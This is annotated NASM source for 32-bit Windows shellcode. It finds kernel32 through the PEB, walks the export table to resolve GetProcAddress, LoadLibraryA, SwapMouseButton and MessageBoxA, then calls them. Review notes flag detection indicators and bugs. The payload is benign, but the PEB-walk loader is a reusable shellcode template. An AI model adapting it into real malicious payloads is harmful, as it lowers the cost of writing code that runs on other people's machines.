shellcode to swap mouse button
;-----------------------------------------------------------------------
; Windows x86 (32-bit) position-independent shellcode, NASM syntax.
; Flow, in order:
;   1. fs:[0x30] -> PEB -> Ldr -> InMemoryOrderModuleList, take the 3rd
;      entry and assume it is kernel32.dll.
;   2. Walk kernel32's export directory by hand to locate GetProcAddress.
;   3. Resolve LoadLibraryA, then user32!SwapMouseButton and
;      user32!MessageBoxA; every API-name string is assembled on the stack.
;   4. Call SwapMouseButton(fSwap) and MessageBoxA(...), then fall through.
; Stack bookkeeping: the "[esp0-N]" notes below are offsets from esp at
; entry (esp0); every push is balanced by an add/pop before the final pop ebx.
; Registers: ebx is saved/restored. eax, ecx, edx, esi and flags are
; clobbered. NOTE(review): esi is callee-saved under stdcall/cdecl and is
; not preserved here; there is no final ret, so control runs off the end
; of this blob into whatever follows it; lodsd assumes DF = 0.
; NOTE(review): from a detection standpoint the fs:[0x30] PEB read, the
; manual export-table walk and the stack-built API-name strings are the
; standard indicators of position-independent shellcode of this kind.
;-----------------------------------------------------------------------
bits 32
jmp start; jumps to the very next instruction (effectively a no-op)
start:
push ebx; [esp0-4] save callee-saved ebx (restored at the very end)
mov ecx, 0x30
mov eax, dword [fs: ecx]; EAX = PEB (TEB+0x30)
mov eax, [eax + 0xc]; EAX = PEB->Ldr
mov esi, [eax + 0x14]; ESI = Ldr.InMemoryOrderModuleList (list head / 1st entry)
lodsd; EAX = 2nd list entry (lodsd also advances esi by 4)
xchg eax, esi; ESI = 2nd entry, so the next lodsd follows its Flink
lodsd; EAX = 3rd entry; assumed to be kernel32.dll (depends on load order, not guaranteed on every Windows build)
mov ebx, [eax + 0x10]; EBX = DllBase of that entry (+0x10 relative to the InMemoryOrder links) = kernel32 base
;// Find the export table of kernel32.dll
mov edx, [ebx + 0x3c]; EDX = IMAGE_DOS_HEADER.e_lfanew
add edx, ebx; EDX = IMAGE_NT_HEADERS
mov edx, [edx + 0x78]; EDX = RVA of the export directory (DataDirectory[0])
add edx, ebx; EDX = IMAGE_EXPORT_DIRECTORY
mov esi, [edx + 0x20]; ESI = RVA of AddressOfNames
add esi, ebx; ESI = AddressOfNames table
xor ecx, ecx; ECX = 0, index into the names table
;// Find GetProcAddress function name
Get_Function:
inc ecx; ECX = (index of the name read below) + 1
lodsd; EAX = RVA of names[ecx-1]; lodsd also advances esi by 4
add eax, ebx; EAX = pointer to the exported name string
cmp dword [eax], 0x50746547; "GetP" (bytes 47 65 74 50 in memory)
jnz Get_Function
cmp dword [eax + 0x4], 0x41636f72; "rocA"
jnz Get_Function
cmp dword [eax + 0x8], 0x65726464; "ddre" — only the first 12 bytes of the name are compared
jnz Get_Function
;// Find the address of GetProcAddress function
mov esi, [edx + 0x24]; ESI = RVA of AddressOfNameOrdinals
add esi, ebx; ESI = AddressOfNameOrdinals table (16-bit entries)
mov cx, [esi + ecx * 2]; CX = ordinal entry. NOTE(review): ecx is still (match index + 1) here, so this reads the entry of the name AFTER the match, not the match itself
dec ecx; NOTE(review): this only cancels the off-by-one when consecutive names have consecutive ordinals; it appears to work in practice because kernel32's name/ordinal tables are laid out that way, but it is fragile
mov esi, [edx + 0x1c]; ESI = RVA of AddressOfFunctions
add esi, ebx; ESI = AddressOfFunctions table
mov edx, [esi + ecx * 4]; EDX = RVA of the function
add edx, ebx; EDX = GetProcAddress
;//Find the LoadLibrary function address
xor ecx, ecx; ECX = 0
push ebx; [esp0-8]  kernel32 base, kept on the stack for later
push edx; [esp0-12] GetProcAddress, kept on the stack for later
push ecx; [esp0-16] 0 = NUL terminator of the string built below
push 0x41797261; "aryA"
push 0x7262694c; "Libr"
push 0x64616f4c; "Load" -> esp now points at "LoadLibraryA\0"
push esp; arg2: lpProcName = "LoadLibraryA"
push ebx; arg1: hModule = kernel32
call edx; EAX = GetProcAddress(kernel32, "LoadLibraryA"); stdcall, callee pops the 2 args
;//Load user32.dll library
add esp, 0xc; drop "Load", "Libr", "aryA"
pop ecx; ECX = the 0 terminator; stack top is now GetProcAddress again
push eax; [esp0-16] LoadLibraryA, kept on the stack for later
push ecx; [esp0-20] 0 = terminator
mov cx, 0x6c6c; ECX = "ll\0\0" (upper half of ecx is still 0, so only 2 chars are written)
push ecx; "ll\0\0"
push 0x642e3233; "32.d"
push 0x72657375; "user" -> esp points at "user32.dll\0"
push esp; arg1: lpLibFileName = "user32.dll"
call eax; EAX = LoadLibraryA("user32.dll"); callee pops the arg
;//Get SwapMouseButton function address
add esp, 0x10; drop "user", "32.d", "ll", 0; stack top is LoadLibraryA
mov edx, [esp + 0x4]; EDX = GetProcAddress (saved at [esp0-12])
push eax; [esp0-20] user32 module handle, kept on the stack for later
xor ecx, ecx; ECX = 0
push ecx; terminator
mov ecx, 0x616E6F74; "tona" — one byte too many, corrected below
push ecx
sub dword [esp + 0x3], 0x61; trailing 'a' (0x61) -> 0, giving "ton\0"; the dword at esp+3 also covers the 0 pushed above, and 0x61-0x61 produces no borrow
push 0x74754265; "eBut"
push 0x73756F4D; "Mous"
push 0x70617753; "Swap" -> esp points at "SwapMouseButton\0"
push esp; arg2: lpProcName = "SwapMouseButton"
push eax; arg1: hModule = user32
call edx; EAX = GetProcAddress(user32, "SwapMouseButton"); callee pops the 2 args
;//Call SwapMouseButton function
add esp, 0x14; drop the 5 dwords of the name; stack top is the user32 handle
xor ecx, ecx; ECX = 0
; inc ecx; (commented out) would make fSwap = TRUE
push ecx; arg1: fSwap = 0 (FALSE) as written. NOTE(review): the original comment said "1", but with the inc above disabled this pushes 0, i.e. the left button is made primary (default mapping)
call eax; SwapMouseButton(fSwap); callee pops the arg
;//Get MessageBoxA function address
mov edx, [esp + 0x8]; EDX = GetProcAddress (at [esp0-12])
mov eax, [esp]; EAX = user32 handle (at [esp0-20])
xor ecx, ecx; ECX = 0
push ecx; terminator
mov ecx, 0x6141786f; "oxAa" — one byte too many, corrected below
push ecx
sub dword [esp + 0x3], 0x61; 'a' -> 0, giving "oxA\0"
push 0x42656761; "ageB"
push 0x7373654d; "Mess" -> esp points at "MessageBoxA\0"
push esp; arg2: lpProcName = "MessageBoxA"
push eax; arg1: hModule = user32
call edx; EAX = GetProcAddress(user32, "MessageBoxA"); callee pops the 2 args
;//Call the MessageBoxA function
add esp, 0x10; drop the 4 dwords of the name; stack top is the user32 handle
mov ecx, 0x6141786f; "oxAa" — the same string is reused as the message text
push ecx
sub dword [esp + 0x3], 0x61; 'a' -> 0 terminates the text; no terminator dword was pushed this time, so the dword at esp+3 overlaps the low 3 bytes of the user32 handle — they are left unchanged because 0x61-0x61 produces no borrow
push 0x42656761; "ageB"
push 0x7373654d; "Mess" -> esp points at "MessageBoxA\0" (lpText)
xor ecx, ecx; ECX = 0
push ecx; arg4: uType = 0 = MB_OK
xor ecx, ecx; redundant, ecx is already 0
push ecx; arg3: lpCaption = NULL (Windows then shows the default caption "Error")
mov ecx, esp
add ecx, 0x08; ECX = esp+8 = address of "MessageBoxA" text, above the two dwords just pushed
push ecx; arg2: lpText = "MessageBoxA"
xor ecx, ecx
push ecx; arg1: hWnd = NULL
call eax; MessageBoxA(NULL, "MessageBoxA", NULL, MB_OK); callee pops the 4 args
;// Clean Stack
add esp, 0x1c; drop 3 dwords of text + user32, LoadLibraryA, GetProcAddress, kernel32 (7 dwords = 0x1c); esp is back at the saved ebx
pop ebx; restore ebx; esp is back at esp0. No ret follows, so execution continues into whatever is placed after this blob